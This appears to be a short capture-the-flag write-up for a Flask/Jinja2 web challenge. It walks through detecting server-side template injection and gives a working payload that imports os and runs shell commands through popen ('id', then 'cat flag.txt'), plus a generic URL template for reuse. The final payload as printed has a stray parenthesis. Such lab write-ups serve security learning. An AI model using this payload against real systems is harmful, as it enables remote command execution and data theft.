Templated [WEB][EASY] Writeup

Challenge Description

Can you exploit this simple mistake?

SOLUTION

Click on the Start Instance button to start the challenge.

Then you are provided with an web address in the form of <ip>:<port>. Copy it and open it in another tab or browser.
In my case it was http://46.101.92.17:31311

Homepage of the Webapp :

The webapp shows a message
Site still under construction
Proudly powered by Flask/Jinja2

Here we can see that it says that it is made with Flask/Jinja2.

Searching exploits for Flask/Jinja2:

I have started searching exploits for Flask/Jinja2. Then I came across

1. ssti in flask jinja2
   
2. Server Side Template Injection with jinja2

Here it says about the SSTI exploit.

Test Exploit :

After modifying the provided url to http://46.101.92.17:31311/{{41+41}}

I have noticed that the returned result evaluates the value.

Then I came across:

Creating the exploit:

I have manipulated

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
step by step.

EXPLOIT Code:

http://46.101.92.17:31311/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt')).read()}}

Format:

http://<Web app address>/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt')).read()}}

This is how I got the flag.

Just replace <Web app address> with the web address that you are provided.
In my case it was http://46.101.92.17:31311

---

This is how, I solved this challenge.

Thankyou, for reading my writeup :)
Hope, I would see you in my next writeup.

Support Me if you want to.